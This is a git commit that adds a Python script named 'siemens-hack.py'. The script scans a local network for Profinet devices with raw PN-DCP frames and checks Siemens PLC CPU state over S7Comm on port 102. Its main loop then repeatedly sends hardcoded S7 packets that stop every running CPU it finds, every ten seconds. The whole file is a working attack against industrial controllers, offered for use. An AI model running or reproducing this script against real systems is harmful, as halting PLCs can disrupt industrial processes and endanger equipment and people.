commit 92a7510d85fee0527cfd2464faaa8607bd235a8e Author: Rick Rongen Date: Sun Sep 1 21:54:39 2024 +0200 Add siemens hack diff --git a/siemens-hack.py b/siemens-hack.py new file mode 100644 index 0000000..d7ea7c8 --- /dev/null +++ b/siemens-hack.py @@ -0,0 +1,486 @@ +#! /usr/bin/env python3 +r""" + Copyright 2022 Photubias(c) + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WAR +RANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + + (Buggy) Linux implementation of this script: https://code.google.com/p/scada-tools/ + python profinet_scanner.py [-i interface] + + DLL Library import based on: https://code.google.com/p/winpcapy/ + + Prerequisites: WinPcap (Windows) or libpcap (Linux) installed + + File name SiemensScan.py + written by tijl[dot]deneut[at]howest[dot]be for IC4 + --- Profinet Scanner --- + It will perform a Layer2 discovery scan (PN_DCP) for Profinet devices, + then list their info (detected only via DCP) + Then give you the option to change network settings for any of them + + --- Siemens Hacker --- + It also performs detailed scanning using S7Comm. + Furthermore, this script reads inputs AND writes & reads outputs. +""" +import os +import re +import socket +import string +import struct +import sys +import time +from binascii import hexlify, unhexlify +from ctypes import CDLL, POINTER, Structure, c_void_p, c_char_p, c_ushort, c_char, c_long, c_int, c_ubyte, \ + byref, create_string_buffer +from ctypes.util import find_library +from multiprocessing.pool import ThreadPool +from pprint import pprint +from subprocess import Popen, PIPE + + +##### Classes +class Sockaddr(Structure): + _fields_ = [("sa_family", c_ushort), + ("sa_data", c_char * 14)] + + +class PcapAddr(Structure): + pass + + +PcapAddr._fields_ = [('next', POINTER(PcapAddr)), + ('addr', POINTER(Sockaddr)), + ('netmask', POINTER(Sockaddr)), + ('broadaddr', POINTER(Sockaddr)), + ('dstaddr', POINTER(Sockaddr))] + + +class PcapIf(Structure): + pass + + +PcapIf._fields_ = [('next', POINTER(PcapIf)), + ('name', c_char_p), + ('description', c_char_p), + ('addresses', POINTER(PcapAddr)), + ('flags', c_int)] + + +class Timeval(Structure): + pass + + +Timeval._fields_ = [('tv_sec', c_long), + ('tv_usec', c_long)] + + +class PcapPkthdr(Structure): + _fields_ = [('ts', Timeval), + ('caplen', c_int), + ('len', c_int)] + + +##### Initialize Pcap +if os.name == 'nt': + try: + os.chdir('C:/Windows/System32/Npcap') + _lib = CDLL('wpcap.dll') + except: + print('Error: WinPcap/Npcap not found!') + print('Please download here: https://nmap.org/npcap/') + input('Press [Enter] to close') + sys.exit(1) +else: + pcaplibrary = find_library('pcap') + if pcaplibrary is None or str(pcaplibrary) == '': + print('Error: Pcap library not found!') + print('Please install with: e.g. apt install libpcap0.8') + input('Press [Enter] to close') + sys.exit(1) + _lib = CDLL(pcaplibrary) + +## match DLL function to list all devices +pcap_findalldevs = _lib.pcap_findalldevs +pcap_findalldevs.restype = c_int +pcap_findalldevs.argtypes = [POINTER(POINTER(PcapIf)), c_char_p] +## match DLL function to open a device: char *device, int snaplen, int prmisc, int to_ms, char *ebuf +## snaplen - maximum size of packets to capture in bytes +## promisc - set card in promiscuous mode? +## to_ms - time to wait for packets in miliseconds before read times out +## errbuf - if something happens, place error string here +pcap_open_live = _lib.pcap_open_live +pcap_open_live.restype = POINTER(c_void_p) +pcap_open_live.argtypes = [c_char_p, c_int, c_int, c_int, c_char_p] +## match DLL function to send a raw packet: pcap device handle, packetdata, packetlength +pcap_sendpacket = _lib.pcap_sendpacket +pcap_sendpacket.restype = c_int +pcap_sendpacket.argtypes = [POINTER(c_void_p), POINTER(c_ubyte), c_int] +## match DLL function to close a device +pcap_close = _lib.pcap_close +pcap_close.restype = None +pcap_close.argtypes = [POINTER(c_void_p)] +## match DLL function to get error message +pcap_geterr = _lib.pcap_geterr +pcap_geterr.restype = c_char_p +pcap_geterr.argtypes = [POINTER(c_void_p)] +## match DLL function to get next packet +pcap_next_ex = _lib.pcap_next_ex +pcap_next_ex.restype = c_int +pcap_next_ex.argtypes = [POINTER(c_void_p), POINTER(POINTER(PcapPkthdr)), POINTER(POINTER(c_ubyte))] + +##### Variables +iDiscoverTimeout = 2 + + +##### Functions +def get_all_interfaces(): + def add_to_arr(array, adapter, ip, mac, device, winguid): + if len(mac) == 17: # When no or bad MAC address (e.g. PPP adapter), do not add + array.append([adapter, ip, mac, device, winguid]) + return array + + # Returns twodimensional array of interfaces in this sequence for each interface: + # [0] = adaptername (e.g. Ethernet or eth0) + # [1] = Current IP (e.g. 192.168.0.2) + # [2] = Current MAC (e.g. ff:ee:dd:cc:bb:aa) + # [3] = Devicename (e.g. Intel 82575LM, Windows only) + # [4] = DeviceGUID (e.g. {875F7EDB-CA23-435E-8E9E-DFC9E3314C55}, Windows only) + interfaces = [] + if os.name == 'nt': # This should work on Windows + proc = Popen("getmac /NH /V /FO csv | FINDSTR /V disconnected", shell=True, stdout=PIPE) + for interface in proc.stdout.readlines(): + intarr = interface.decode().split(',') + adapter = intarr[0].replace('"', '') + devicename = intarr[1].replace('"', '') + mac = intarr[2].replace('"', '').lower().replace('-', ':') + winguid = intarr[3].replace('"', '').replace('\n', '').replace('\r', '')[-38:] + proc = Popen('netsh int ip show addr "' + adapter + '" | FINDSTR /I IP', shell=True, stdout=PIPE) + try: + ip = re.findall(r'[0-9]+(?:\.[0-9]+){3}', + proc.stdout.readlines()[0].decode(errors='ignore').replace(' ', ''))[0] + except: + ip = '' + interfaces = add_to_arr(interfaces, adapter, ip, mac, devicename, winguid) + + else: # And this on any Linux + # proc=Popen("for i in `ifconfig -a | grep \"Link encap:\" | awk '{print $1}'`;do echo \"$i `ifconfig $i | sed 's/inet addr:/inet addr: /' | grep \"inet addr:\" | awk '{print $3}'` `ifconfig $i | grep HWaddr | awk '{print $5}'`\" | sed '/lo/d';done", shell=True, stdout=PIPE) + proc = Popen( + "for i in $(ip address | grep -v \"lo\" | grep \"default\" | cut -d\":\" -f2 | cut -d\" \" -f2);do echo $i $(ip address show dev $i | grep \"inet \" | cut -d\" \" -f6 | cut -d\"/\" -f1) $(ip address show dev $i | grep \"ether\" | cut -d\" \" -f6);done", + shell=True, stdout=PIPE) + for interface in proc.stdout.readlines(): + intarr = interface.decode().split(' ') + if len(intarr) < 3: continue ## Device has no MAC address, L2 scanning not an option + interfaces = add_to_arr(interfaces, intarr[0], intarr[1], intarr[2].replace('\n', ''), '', '') + + return interfaces + + +## Expects sData like this 01020304050607 and returns bytearray +def create_packet(s_data): + b_hex_data = unhexlify(s_data) + arr_byte_packet = (c_ubyte * len(b_hex_data))() + b = bytearray() + b.extend(b_hex_data) + for i in range(0, len(b_hex_data)): arr_byte_packet[i] = b[i] + return arr_byte_packet + + +## Actually sends a packet +def send_raw_packet(b_npfdevice, s_ethertype, s_srcmac, bool_set_network=False, s_network_data_to_set='', s_dstmac=''): + if s_ethertype == '88cc': # LLDP Packet + s_dstmac = '0180c200000e' + s_data = '0210077365727665722d6e6574776f726b6d040907706f72742d303031060200140a0f5345525645522d4e4554574f524b4d0c60564d776172652c20496e632e20564d77617265205669727475616c20506c6174666f726d2c4e6f6e652c564d776172652d34322033362036642039622034302062642038642038302d66302037362061312066302035332030392039352032370e040080008010140501ac101e660200000001082b0601040181c06efe08000ecf0200000000fe0a000ecf05005056b6feb6fe0900120f0103ec0300000000' + elif s_ethertype == '8100': # PN-DCP, Profinet Discovery Packet, sEthertype '8100' + s_dstmac = '010ecf000000' + s_data = '00008892fefe05000400000300800004ffff00000000000000000000000000000000000000000000000000000000' + elif s_ethertype == '8892' and bool_set_network: + ## Create packet to set networkdata, expect data in hexstring + s_data = ( + 'fefd 04 00 04000001 0000 0012 0102 000e 0001' + s_network_data_to_set + '0000 0000 0000 0000 0000 0000').replace( + ' ', '') # Working + elif s_ethertype == '8892' and not bool_set_network: + ## Create custom packet with 'networkDataToSet' as the data (including length) and dstmac as dstmac + s_data = s_network_data_to_set + + ## Get packet as a bytearray + arr_byte_packet = create_packet(s_dstmac + s_srcmac + s_ethertype + s_data) + + ## Send the packet + buf_errbuf = create_string_buffer(256) + handle_pcap_dev = pcap_open_live(b_npfdevice, 65535, 1, 1000, + buf_errbuf) ## Device, max packet size, promiscuous mode, time limit in ms, buffer for errors + if not bool(handle_pcap_dev): + print('\nError: Please use sudo!\n') + # else: print('\nUnable to open the adapter. %s is not supported by Pcap\n' % interfaces[int(answer - 1)][0]) + sys.exit(1) + + if pcap_sendpacket(handle_pcap_dev, arr_byte_packet, len(arr_byte_packet)) != 0: + print('\nError sending the packet: %s\n' % pcap_geterr(handle_pcap_dev)) + sys.exit(1) + + pcap_close(handle_pcap_dev) + return arr_byte_packet + + +## Receive packets, expect device to receive on, src mac address + ethertype to filter on and timeout in seconds +def receive_raw_packets(b_npfdevice, i_timeout, s_srcmac, s_ethertype, stop_on_receive=False): + arr_received_raw_data = [] + buf_errbuf = create_string_buffer(256) + handle_pcap_dev = pcap_open_live(b_npfdevice, 65535, 1, 1000, + buf_errbuf) ## Device, max packet size, promiscuous mode, time limit in ms, buffer for errors + if not bool(handle_pcap_dev): + print('\nUnable to open the adapter. {} is not supported by Pcap\n'.format(b_npfdevice)) + sys.exit(1) + + ptr_header = POINTER(PcapPkthdr)() + ptr_pkt_data = POINTER(c_ubyte)() + i_receivedpacket = pcap_next_ex(handle_pcap_dev, byref(ptr_header), byref(ptr_pkt_data)) + ## Regular handler, loop until told otherwise (or with timer) + fl_timer = time.time() + int(i_timeout) + i = 0 + while i_receivedpacket >= 0: + i_timeleft = int(round(fl_timer - time.time(), 0)) + status('Received packets: %s, time left: %i \r' % (str(i), i_timeleft)) + if i_timeleft <= 0: break ## PCAP networkstack timeout elapsed or regular timeout + lst_rawdata = ptr_pkt_data[0:ptr_header.contents.len] + s_packettype = hexlify(bytearray(lst_rawdata[12:14])).decode().lower() + s_targetmac = hexlify(bytearray(lst_rawdata[:6])).decode().lower() + if s_packettype == s_ethertype.lower() and s_srcmac.lower() == s_targetmac: + # print('Succes! Found an %s packet.' % sEthertype) + arr_received_raw_data.append(lst_rawdata) + if stop_on_receive: break + + ## Load next packet + i_receivedpacket = pcap_next_ex(handle_pcap_dev, byref(ptr_header), byref(ptr_pkt_data)) + i += 1 + pcap_close(handle_pcap_dev) + return arr_received_raw_data + + +## Parsing the Raw PN_DCP data on discovery (source: https://code.google.com/p/scada-tools/source/browse/profinet_scanner.py) +## Returns type_of_station, name_of_station, vendor_id, device_id, device_role, ip_address, subnet_mask, standard_gateway +def parse_response(s_hexdata, s_mac): + arr_device = { + 'mac_address': s_mac, + 'type_of_station': 'None', + 'name_of_station': 'None', + 'vendor_id': 'None', + 'device_id': 'None', + 'device_role': 'None', + 'ip_address': 'None', + 'subnet_mask': 'None', + 'standard_gateway': 'None', + 'hardware': None, + 'firmware': None, + } + ## Since this is the parse of a DCP identify response, data should start with feff (Profinet FrameID 0xFEFF) + if not str(s_hexdata[:4]).lower() == 'feff': + print('Error: this data is not a proper DCP response?') + return arr_device + + data_to_parse = s_hexdata[24:] # (Static) offset to where first block starts + while len(data_to_parse) > 0: + ## Data is divided into blocks, where block length is set at byte 2 & 3 (so offset [4:8]) of the block + block_length = int(data_to_parse[2 * 2:4 * 2], 16) + block = data_to_parse[:(4 + block_length) * 2] + + ## Parse the block + block_id = str(block[:2 * 2]) + if block_id == '0201': + arr_device['type_of_station'] = str(unhexlify(block[4 * 2:4 * 2 + block_length * 2]))[2:-1].replace(r'\x00', + '') + elif block_id == '0202': + arr_device['name_of_station'] = str(unhexlify(block[4 * 2:4 * 2 + block_length * 2]))[2:-1].replace(r'\x00', + '') + elif block_id == '0203': + arr_device['vendor_id'] = str(block[6 * 2:8 * 2]) + arr_device['device_id'] = str(block[8 * 2:10 * 2]) + elif block_id == '0204': + arr_device['device_role'] = str(block[6 * 2:7 * 2]) + devrole = '' + + elif block_id == '0102': + arr_device['ip_address'] = socket.inet_ntoa(struct.pack(">L", int(block[6 * 2:10 * 2], 16))) + arr_device['subnet_mask'] = socket.inet_ntoa(struct.pack(">L", int(block[10 * 2:14 * 2], 16))) + arr_device['standard_gateway'] = socket.inet_ntoa(struct.pack(">L", int(block[14 * 2:18 * 2], 16))) + + ## Maintain the loop + padding = block_length % 2 # Will return 1 if odd + data_to_parse = data_to_parse[(4 + block_length + padding) * 2:] + + return arr_device + + +def status(msg): + sys.stderr.write(msg) + sys.stderr.flush() + + +def send_and_recv(sock, strdata, sendOnly=False): + data = unhexlify(strdata.replace(' ', '').lower()) ## Convert to real HEX (\x00\x00 ...) + sock.send(data) + if sendOnly: return + ret = sock.recv(65000) + return ret + + +def get_cpu(device): + s_statee = 'Running' + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(1) # 1 second timeout + try: + sock.connect((device['ip_address'], 102)) ## Will setup TCP/SYN with port 102 + except: + return 'Unknown' + # Firstly: the COTP Connection Request (CR), should result in Connection Confirm (CC) + ## TPKT header + COTP CR TPDU with src-ref 0x0005 (gets response with dst-ref 0x0005) + cotpconnectresponse = hexlify(send_and_recv(sock, '03000016' + '11e00000001d00c1020100c2020100c0010a')).decode( + errors='ignore') + ## Response should be 03000016 11d00005001000c0010ac1020600c2020600 + if not cotpconnectresponse[10:12] == 'd0': + print('COTP Connection Request failed') + return '' + ##---- S7 Setup Comm ------------ + ## TPKT header + COTP header + S7 data (which is: Header -Job- + Parameter -Setup-) + s7setupdata = '32010000020000080000' + 'f0000001000101e0' + tpktlength = str(hex(int((len(s7setupdata) + 14) / 2)))[2:] + s7setup = send_and_recv(sock, '030000' + tpktlength + '02f080' + s7setupdata) + ##---- S7 Request CPU ----------- + s7readdata = '3207000005000008 000800011204 11440100ff09000404240001' + tpktlength = str(hex(int((len(s7readdata.replace(' ', '')) + 14) / 2)))[2:] + s7read = send_and_recv(sock, '030000' + tpktlength + '02f080' + s7readdata) + if hexlify(s7read[44:45]).decode(errors='ignore') == '03': s_statee = 'Stopped' + sock.close() + return s_statee + + +def change_cpu(device): + cur_state = get_cpu(device) + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(1) + sock.connect((device['ip_address'], 102)) ## Will setup TCP/SYN with port 102 + ## CR TPDU + send_and_recv(sock, '03000016' + '11e00000002500c1020600c2020600c0010a') + ## 'SubscriptionContainer' + sResp = hexlify(send_and_recv(sock, + '030000c0' + '02f080' + '720100b131000004ca0000000200000120360000011d00040000000000a1000000d3821f0000a3816900151653657276657253657373696f6e5f4536463534383534a3822100150b313a3a3a362e303a3a3a12a3822800150d4f4d532b204465627567676572a38229001500a3822a001500a3822b00048480808000a3822c001211e1a300a3822d001500a1000000d3817f0000a38169001515537562736372697074696f6e436f6e7461696e6572a2a20000000072010000')).decode( + errors='ignore') + s_sid = str(hex(int('0' + sResp[48:50], 16) + int('80', 16))).replace('0x', '') + if len(s_sid) % 2 == 1: s_sid = '0' + s_sid + # print('Using SID ' + sSID) + if cur_state == 'Stopped': ## Will perform start + send_and_recv(sock, + '03000078' + '02f080' + '72020069310000054200000003000003' + s_sid + '34000003 ce 010182320100170000013a823b00048140823c00048140823d000400823e00048480c040823f0015008240001506323b313035388241000300030000000004e88969001200000000896a001300896b000400000000000072020000') + else: + send_and_recv(sock, + '03000078' + '02f080' + '72020069310000054200000003000003' + s_sid + '34000003 88 010182320100170000013a823b00048140823c00048140823d000400823e00048480c040823f0015008240001506323b313035388241000300030000000004e88969001200000000896a001300896b000400000000000072020000') + send_and_recv(sock, + '0300002b' + '02f080' + '7202001c31000004bb00000005000003' + s_sid + '34000000010000000000000000000072020000') + send_and_recv(sock, + '0300002b' + '02f080' + '7202001c31000004bb00000006000003' + s_sid + '34000000020001010000000000000072020000') + runloop = True + print('--- Getting data ---') + while runloop: + try: + response = sock.recv(65000) + except: + runloop = False + try: + send_and_recv(sock, + '03000042' + '02f080' + '7202003331000004fc00000007000003' + s_sid + '360000003402913d9b1e000004e88969001200000000896a001300896b00040000000000000072020000') + except: + sock.close() + return False + if cur_state == 'Stopped': ## Will perform start + send_and_recv(sock, + '03000043' + '02f080' + '7202003431000004f200000008000003' + s_sid + '36000000340190770008 03 000004e88969001200000000896a001300896b00040000000000000072020000') + else: + send_and_recv(sock, + '03000043' + '02f080' + '7202003431000004f200000008000003' + s_sid + '36000000340190770008 01 000004e88969001200000000896a001300896b00040000000000000072020000') + send_and_recv(sock, + '0300003d' + '02f080' + '7202002e31000004d40000000a000003' + s_sid + '34000003d000000004e88969001200000000896a001300896b000400000000000072020000') + + sock.close() + return True + + +def scan_network(s_adapter, s_macaddr, s_winguid): + ## We use Pcap, so we need the Pcap device (for Windows: \Device\NPF_{GUID}, for Linux: 'eth0') + if os.name == 'nt': s_adapter = r'\Device\NPF_' + s_winguid + # print('Using adapter ' + sAdapter + '\n') + b_npfdevice = s_adapter.encode() + + ## Start building discovery packet + print('Building packet') + + ## Sending the raw packet (packet itself is returned) (8100 == PN_DCP, 88cc == LDP) + packet = send_raw_packet(b_npfdevice, '8100', s_macaddr) + print('\nPacket has been sent (' + str(len(packet)) + ' bytes)') + + ## Receiving packets as bytearr (88cc == LDP, 8892 == device PN_DCP) + print('\nReceiving packets over ' + str(iDiscoverTimeout) + ' seconds ...\n') + received_data_arr = receive_raw_packets(b_npfdevice, iDiscoverTimeout, s_macaddr, '8892') + print() + print('\nSaved ' + str(len(received_data_arr)) + ' packets') + print() + return received_data_arr, b_npfdevice + + +def parse_data(received_data_arr): + # print('These are the devices detected ({}):'.format(len(receivedDataArr))) + # print('{0:17} | {1:20} | {2:20} | {3:15} | {4:9}'.format('MAC address', 'Device', 'Device Type', 'IP Address', 'Vendor ID')) + lst_devices = [] + for packet in received_data_arr: + s_hexdata = hexlify(bytearray(packet))[28:].decode(errors='ignore') # take off ethernet header + ## Parse function returns type_of_station, name_of_station, vendor_id, device_id, device_role, ip_address, subnet_mask, standard_gateway + ## takes 'translate' as a parameter, which will add these parsings: + ## (vendor id 002a == siemens) (device id 0a01=switch, 0202=simulator, 0203=s7-300 CP, 0101=s7-300 ...) + ## (0x01==IO-Device, 0x02==IO-Controller, 0x04==IO-Multidevice, 0x08==PN-Supervisor), (0000 0001, 0000 0010, 0000 0100, 0000 1000) + ## Getting MAC address from packet, formatting with ':' in between + s_mac = ':'.join(re.findall('(?s).{,2}', str(hexlify(bytearray(packet)).decode(errors='ignore')[6 * 2:12 * 2])))[ + :-1] + arr_result = parse_response(s_hexdata, s_mac) + lst_devices.append(arr_result) + # sDevicename = str(arrResult['name_of_station']) + # if sDevicename == '': sDevicename = str(arrResult['type_of_station']) + # print('{0:17} | {1:20} | {2:20} | {3:15} | {4:9}'.format(sMac, sDevicename, arrResult['type_of_station'], arrResult['ip_address'], arrResult['vendor_id'])) + return lst_devices + + +def main(): + interfaces = get_all_interfaces() + s_adapter = interfaces[0][0] # eg: 'Ethernet 2' + s_macaddr = interfaces[0][2].replace(':', '') # eg: 'ab58e0ff585a' + s_winguid = interfaces[0][4] # eg: '{875F7EDB-CA23-435E-8E9E-DFC9E3314C55}' + + received_data_arr, b_npfdevice = scan_network(s_adapter, s_macaddr, s_winguid) + + lst_devices = parse_data(received_data_arr) + + print(f"Found {len(lst_devices)} devices") + for lst_device in lst_devices: + pprint(lst_device) + + while True: + print("Stopping all CPUs") + for device in lst_devices: + current_state = get_cpu(device) + if current_state == 'Running': + change_cpu(device) + time.sleep(10) + + +if __name__ == '__main__': + main()